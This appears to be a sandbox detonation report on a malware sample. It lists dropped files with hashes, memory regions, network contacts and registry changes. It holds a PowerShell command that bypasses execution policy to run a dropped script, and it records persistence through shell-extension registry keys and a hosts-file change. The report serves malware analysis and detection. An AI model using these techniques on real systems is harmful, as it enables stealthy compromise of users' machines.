SHA256 c59448b470702a689cb0525b76d28d68b2436c4f23cac4ee18a32a7a99801eb6
SHA512 ed02644d9621256b2c0bd43eac5d46f1be3ccf741b3701ff624e0f0913bd6829d818d3006619f90fded694c01940e4fca7b1eac92cd647b87212efd4532ccbe0

C:\Users\Admin\AppData\Roaming\services\2plugin2901

MD5 d4121fa27ad9f3c93d00312846a7a2cc
SHA1 ce84a218b13b9084b4d30f18fcea720e078c4c9c
SHA256 ffba3263bcdd2a3b008113b62dd9853d80d279350e548f50485b75925c9d5079
SHA512 65461ca95eae4d51ee691e5a444e14f2cc18e44089c5137bf9060111c111eaeb31f74ca2b155c41d2e0f1fa3d8d4c8288a68fa47dab4fee9e80a627bd20e2ac8

C:\Users\Admin\AppData\Roaming\services\2plugin2901

MD5 5a5a545484abcfd739e596c1ff8753d5
SHA1 42543fdc4b7620ba21ba5d27fd4ab45a549eb503
SHA256 872b4526efdb11051475cfde82c187adfa80a2496ed9835550c1421a039a203e
SHA512 7a1516dab7c58455fe687cec52c522aa111d0b454d8c7c390417e134a2e1631a9bd68c71f82c92423dce598244c71c67e7576121e7ea4c931421a3458f798374

memory/4036-340-0x00007FF660E30000-0x00007FF6617C5000-memory.dmp

C:\Users\Admin\AppData\Roaming\services\.wget-hsts

MD5 2e7e79b18cce7c94164385b314d90f53
SHA1 a7833fce28106e00572c125bc6ea992b8d150a34
SHA256 2e6f936a73f307d230802c14a6aafa06c8e53dcec51ae032acc50cb58e245570
SHA512 dfa49cfb4d64dfc5d20d153c15c696415eccf5da08a4df48f11eeb10bfc29dd3157875c5eca7e6e620113a9191344907828f9c56d8f6018686064ff8b2935c09

memory/1492-347-0x000001F7C5DC0000-0x000001F7C5DE2000-memory.dmp

memory/1492-348-0x00007FFEE58E0000-0x00007FFEE62CC000-memory.dmp

memory/1492-350-0x000001F7C5E30000-0x000001F7C5E40000-memory.dmp

memory/1492-349-0x000001F7C5E30000-0x000001F7C5E40000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 1382baf175d45c3403f7876af44f4e5d
SHA1 22ac418cfb7969eb2594103b7b9453ba47d5442f
SHA256 dbd14887459c04a3cfc9794da8ab8e6ccbf6a9ed0762055b15d8e55883308374
SHA512 63c7aa001a6b005f6eb04c8484dc7586bf8f7e975ae9c7e9a460c220ae1ffefbb14531067f61e5a5a51f20d4b967c399782c28d70538a12d7aa7ac72fa444b24

memory/1492-354-0x000001F7C5FC0000-0x000001F7C6036000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

MD5 c2d06c11dd1f1a8b1dedc1a311ca8cdc
SHA1 75c07243f9cb80a9c7aed2865f9c5192cc920e7e
SHA256 91ac15f1f176f74f02ce89ecdc443d8e33e0064c7bc69a87c7b2da145449d586
SHA512 db00860292c3e7430b1534f459c2f0f9778df3a94c51d622dcf1cde390a5539bdc6d60a0d41e6f1ed99a989f17ecb109abd4c17faac4cd398945536f1d0ebb4d

memory/1492-400-0x000001F7C5E20000-0x000001F7C5E2A000-memory.dmp

memory/1492-401-0x00007FF7D73F0000-0x00007FF7D7400000-memory.dmp

memory/1492-459-0x000001F7C5E30000-0x000001F7C5E40000-memory.dmp

memory/1492-483-0x000001F7C5E30000-0x000001F7C5E40000-memory.dmp

memory/1492-493-0x00007FFEE58E0000-0x00007FFEE62CC000-memory.dmp

memory/4036-496-0x00007FF660E30000-0x00007FF6617C5000-memory.dmp

memory/4352-500-0x00007FF790D40000-0x00007FF7916D5000-memory.dmp

memory/3736-503-0x00007FFEE58E0000-0x00007FFEE62CC000-memory.dmp

memory/3736-505-0x0000016D4EE70000-0x0000016D4EE80000-memory.dmp

memory/3736-506-0x0000016D4EE70000-0x0000016D4EE80000-memory.dmp

memory/3736-526-0x00007FF7D75A0000-0x00007FF7D75B0000-memory.dmp

memory/3736-525-0x0000016D4EFD0000-0x0000016D4EFEC000-memory.dmp

memory/3736-532-0x0000016D4F1B0000-0x0000016D4F269000-memory.dmp

memory/3736-621-0x0000016D4EE70000-0x0000016D4EE80000-memory.dmp

memory/3736-624-0x0000016D4EE70000-0x0000016D4EE80000-memory.dmp

memory/164-646-0x0000000000400000-0x00000000008F2000-memory.dmp

memory/3736-658-0x00007FFEE58E0000-0x00007FFEE62CC000-memory.dmp

memory/2928-661-0x0000000140000000-0x000000014000D000-memory.dmp

C:\Windows\system32\drivers\etc\hosts

MD5 7575c74a6cb2582fe872ec4e5c34d9ae
SHA1 8616d5c5687df7133cb3320d131ab82a25197ca7
SHA256 5cfc757280526df2130740c4fc1722623bb6a51866af1b4f4fba8acaf2b23064
SHA512 8afc0d7c08397a0efc03b313fd9a4986f29c3415ccd640e582fa60a0d3696539243e8d3859cd1b06aea632646b5eb31ffff5cc73ca3df1ac178f44397607b860

memory/2928-662-0x0000000140000000-0x000000014000D000-memory.dmp

memory/2928-663-0x0000000140000000-0x000000014000D000-memory.dmp

memory/2928-664-0x0000000140000000-0x000000014000D000-memory.dmp

memory/2928-665-0x0000000140000000-0x000000014000D000-memory.dmp

memory/2928-668-0x0000000140000000-0x000000014000D000-memory.dmp

memory/196-669-0x0000000140000000-0x0000000140AB6000-memory.dmp

memory/196-670-0x0000000140000000-0x0000000140AB6000-memory.dmp

memory/196-671-0x0000000140000000-0x0000000140AB6000-memory.dmp

memory/196-672-0x0000000140000000-0x0000000140AB6000-memory.dmp

memory/196-676-0x0000000140000000-0x0000000140AB6000-memory.dmp

memory/4352-675-0x00007FF790D40000-0x00007FF7916D5000-memory.dmp

memory/196-679-0x0000000140000000-0x0000000140AB6000-memory.dmp

memory/196-680-0x0000000140000000-0x0000000140AB6000-memory.dmp

C:\Users\Admin\AppData\Roaming\services\WinRAR.exe

MD5 ed8f7b42b7277a00a8f6eb192dc0bd77
SHA1 34ff362e6b95852d84580a3430f84da939671c59
SHA256 4af7ef4064e4543d12f19d0edc2a7966e3f91412dff582333ecc0d8e599e9a30
SHA512 15e66093b010741788c24c4a14c824a5ef92a3de9618e7c9eae002ce90cc6c89ff35228e4b202cb2f538b8fc57688e40eaee07395608f32a291753fc09396c2f

memory/196-682-0x0000000140000000-0x0000000140AB6000-memory.dmp

memory/196-683-0x0000000140000000-0x0000000140AB6000-memory.dmp

C:\Users\Admin\AppData\Roaming\services\03plugins0222.rar

MD5 4a3baa2e2630e287a5c0e804c0564ca0
SHA1 c00ae566d6c2dc3f6e20566955d210a16807e028
SHA256 c039a58e89ffc961c978c61cd8746b95c481251381b62acaec252f26e184e919
SHA512 606e9507f80241b932c4f3d4c8fc0207d3e36557d5b1e2837436dc9d6f5b58e7204b18935a091b8a5eff0ea75ef47d14f045cad2a120e43c07de35019849cd16

memory/196-686-0x0000000140000000-0x0000000140AB6000-memory.dmp

memory/196-684-0x0000000140000000-0x0000000140AB6000-memory.dmp

memory/196-687-0x0000000140000000-0x0000000140AB6000-memory.dmp

memory/196-688-0x0000000140000000-0x0000000140AB6000-memory.dmp

memory/196-689-0x0000000140000000-0x0000000140AB6000-memory.dmp

memory/196-690-0x0000000140000000-0x0000000140AB6000-memory.dmp

memory/196-691-0x0000000140000000-0x0000000140AB6000-memory.dmp

memory/196-692-0x0000000140000000-0x0000000140AB6000-memory.dmp

memory/196-693-0x0000000140000000-0x0000000140AB6000-memory.dmp

memory/196-694-0x0000000140000000-0x0000000140AB6000-memory.dmp

memory/196-695-0x0000000140000000-0x0000000140AB6000-memory.dmp

memory/196-696-0x0000000140000000-0x0000000140AB6000-memory.dmp

memory/196-697-0x0000000140000000-0x0000000140AB6000-memory.dmp

memory/196-698-0x0000000140000000-0x0000000140AB6000-memory.dmp

memory/196-699-0x0000000140000000-0x0000000140AB6000-memory.dmp

memory/196-700-0x0000000140000000-0x0000000140AB6000-memory.dmp

memory/196-701-0x0000000140000000-0x0000000140AB6000-memory.dmp

memory/196-702-0x0000000140000000-0x0000000140AB6000-memory.dmp

memory/196-703-0x0000000140000000-0x0000000140AB6000-memory.dmp

memory/196-704-0x0000000140000000-0x0000000140AB6000-memory.dmp

memory/196-709-0x0000000140000000-0x0000000140AB6000-memory.dmp

memory/196-710-0x00007FFEF2D70000-0x00007FFEF2F4B000-memory.dmp

memory/196-712-0x0000000140000000-0x0000000140AB6000-memory.dmp

memory/196-711-0x0000000140000000-0x0000000140AB6000-memory.dmp

memory/196-713-0x0000000140000000-0x0000000140AB6000-memory.dmp

memory/196-715-0x0000000140000000-0x0000000140AB6000-memory.dmp

memory/196-716-0x0000000140000000-0x0000000140AB6000-memory.dmp

memory/196-717-0x000001D3297E0000-0x000001D329800000-memory.dmp

memory/196-719-0x0000000140000000-0x0000000140AB6000-memory.dmp

memory/196-720-0x0000000140000000-0x0000000140AB6000-memory.dmp

memory/196-718-0x0000000140000000-0x0000000140AB6000-memory.dmp

memory/196-721-0x0000000140000000-0x0000000140AB6000-memory.dmp

memory/196-722-0x0000000140000000-0x0000000140AB6000-memory.dmp

memory/196-724-0x000001D3ABA20000-0x000001D3ABA40000-memory.dmp

C:\Users\Admin\AppData\Roaming\services\3plugin0222

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Roaming\services\3plugin0222

MD5 028aef2aedb49bb9148e23b3b7b03d37
SHA1 94efee9913eed144e9c1c9727cf82543f65c0ed9
SHA256 bd3ad16cfba1acfcca16be462fe11c0ad79dda99dac169c160d07cc47b3533c2
SHA512 a02ebba3a92fcd7869b87e71f3d5e6238fc738eada46f67e8320d7fad7119f676158b67f18bd3272eb1caedbf521f260bd59b9f5517fb257b50d1168d708ba57

memory/4632-730-0x00000000002B0000-0x0000000000326000-memory.dmp

memory/4632-731-0x00000000725E0000-0x0000000072CCE000-memory.dmp

memory/4632-732-0x0000000004C80000-0x0000000004C90000-memory.dmp

memory/4632-737-0x00000000725E0000-0x0000000072CCE000-memory.dmp

memory/164-738-0x00000000725E0000-0x0000000072CCE000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\3plugin0222.log

MD5 807cb75397a3a9fc38e9fb5f8566eb2d
SHA1 367e151fab5a5a80e60202d287ae522ea53e2563
SHA256 3e5056b73303b361e6b7b52f5edb2ed1a7e9dc2c762bb91d18046f42bc2ffcf3
SHA512 49efef0401ba0e0dc0b30bdff5d414da5494e4194c6269da2cb40b1ab7dc53e7858d29d2b9982bf3ee60ebc9638b5ed2b5ddcbb536bcc57729e79fc81f59f13d

C:\Users\Admin\AppData\Roaming\services\3plugin0222

MD5 ed890fea49ea376d0464e8f04ee58811
SHA1 f3134c8c4b2549e38362d1372f6f6b5a2372aee0
SHA256 1e328ea5223b16dec5b109c8b412e71d891e12d0de423b72f6b473d858c0b362
SHA512 1b5b83412f8ea62e502129abb3664608fd4688286ff8fc5d7b0eab4cee0c5457793ddd5eebf29978cce20bac86e79351df6480336b6913bdc02a4ebc30e48dc4

memory/164-733-0x0000000000400000-0x0000000000450000-memory.dmp

memory/164-739-0x0000000005240000-0x00000000052D2000-memory.dmp

C:\Users\Admin\AppData\Roaming\services\WGET-H~1

MD5 990d670f7d0d9addc18642f106831b36
SHA1 b3b3f72b362c153a8fa060b6e26c0972682e3582
SHA256 dbd84f95c50bcad3bdd257368e723deee49c428a4434c1a6ffb2852f12611253
SHA512 25bde6d8817126077b27b11042b42424d23ca9168e127812c31f2f7aeda93e9e47c971fd0d4b9e36cbee405f3e4085ae14e362deae76148fe69d9c5bb0f7206a

memory/196-752-0x0000000140000000-0x0000000140AB6000-memory.dmp

memory/196-753-0x0000000140000000-0x0000000140AB6000-memory.dmp

memory/196-756-0x0000000140000000-0x0000000140AB6000-memory.dmp

Analysis: behavioral7

Detonation Overview

Submitted

2024-02-23 10:15

Reported

2024-02-23 10:22

Platform

win10-20240214-en

Max time kernel

117s

Max time network

131s

Command Line

powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\data\AppInfo\YwTGpGD7UtG1.ps1

Signatures

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\system32\AUDIODG.EXE N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\AUDIODG.EXE N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\data\AppInfo\YwTGpGD7UtG1.ps1

C:\Windows\system32\AUDIODG.EXE

C:\Windows\system32\AUDIODG.EXE 0x410

Network

Country Destination Domain Proto
US 20.231.121.79:80 tcp
NL 52.111.243.30:443 tcp
US 8.8.8.8:53 200.201.50.20.in-addr.arpa udp
US 8.8.8.8:53 210.178.17.96.in-addr.arpa udp

Files

memory/3244-4-0x00007FF8B9920000-0x00007FF8BA30C000-memory.dmp

memory/3244-6-0x0000024B42120000-0x0000024B42130000-memory.dmp

memory/3244-5-0x0000024B42120000-0x0000024B42130000-memory.dmp

memory/3244-7-0x0000024B42170000-0x0000024B42192000-memory.dmp

memory/3244-10-0x0000024B5A950000-0x0000024B5A9C6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_v1hzz0dj.dw2.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/3244-31-0x0000024B42120000-0x0000024B42130000-memory.dmp

memory/3244-37-0x00007FF8B9920000-0x00007FF8BA30C000-memory.dmp

Analysis: behavioral11

Detonation Overview

Submitted

2024-02-23 10:15

Reported

2024-02-23 10:23

Platform

win10-20240221-en

Max time kernel

116s

Max time network

149s

Command Line

"C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe"

Signatures

Modifies system executable filetype association

persistence
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\PropertySheetHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA} C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\PropertySheetHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA}\ C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\WinRAR32 C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\WinRAR32\ = "{B41DB860-8EE4-11D2-9906-E49FADC173CA}" C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\PropertySheetHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA} C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\PropertySheetHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA}\ C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\WinRAR C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\WinRAR\ = "{B41DB860-64E4-11D2-9906-E49FADC173CA}" C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe N/A

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.REV\shell\open C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shellex\ContextMenuHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA} C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shellex\PropertySheetHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA}\ C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\DragDropHandlers\WinRAR C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.REV\shell\open\command C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\PropertySheetHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA}\ C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shellex\PropertySheetHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA} C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex\ContextMenuHandlers\WinRAR C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\PropertySheetHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA} C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\WinRAR32 C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\ContextMenuHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA}\ C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.REV\DefaultIcon C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\WinRAR32\ = "{B41DB860-8EE4-11D2-9906-E49FADC173CA}" C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\DragDropHandlers\WinRAR32\ = "{B41DB860-8EE4-11D2-9906-E49FADC173CA}" C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\WinRAR C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\ContextMenuHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA}\ C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\ContextMenuHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA} C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex\DragDropHandlers\WinRAR C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.rev C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\DefaultIcon C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\PropertySheetHandlers C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shellex\PropertySheetHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA} C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex\DragDropHandlers\WinRAR32\ = "{B41DB860-8EE4-11D2-9906-E49FADC173CA}" C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\PropertySheetHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA}\ C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\ContextMenuHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA} C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shellex\PropertySheetHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA}\ C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\PropertySheetHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA}\ C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\WinRAR\ = "{B41DB860-64E4-11D2-9906-E49FADC173CA}" C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shellex\PropertySheetHandlers C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shell C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shell\open\command\ = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\data\\AppInfo\\services\\WinRAR.exe\" \"%1\"" C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex\DragDropHandlers\WinRAR\ = "{B41DB860-64E4-11D2-9906-E49FADC173CA}" C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\WinRAR C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\ = "WinRAR archive" C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shell\open C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex\ContextMenuHandlers\WinRAR32 C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shellex\ContextMenuHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA} C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\DropHandler\ = "{B41DB860-64E4-11D2-9906-E49FADC173CA}" C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.REV\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\data\\AppInfo\\services\\WinRAR.exe,1" C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.REV\shell C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\PropertySheetHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA} C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\PropertySheetHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA}\ C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\DropHandler\ = "{B41DB860-8EE4-11D2-9906-E49FADC173CA}" C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\PropertySheetHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA} C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\DefaultIcon C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\data\\AppInfo\\services\\WinRAR.exe,0" C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\DropHandler C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex\DragDropHandlers\WinRAR32 C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex\ContextMenuHandlers\WinRAR\ = "{B41DB860-64E4-11D2-9906-E49FADC173CA}" C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\WinRAR\ = "{B41DB860-64E4-11D2-9906-E49FADC173CA}" C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\DragDropHandlers\WinRAR\ = "{B41DB860-64E4-11D2-9906-E49FADC173CA}" C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\data\\AppInfo\\services\\WinRAR.exe,0" C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.REV\ = "RAR recovery volume" C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\ContextMenuHandlers C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shellex\DropHandler C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\DragDropHandlers\WinRAR32 C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe N/A
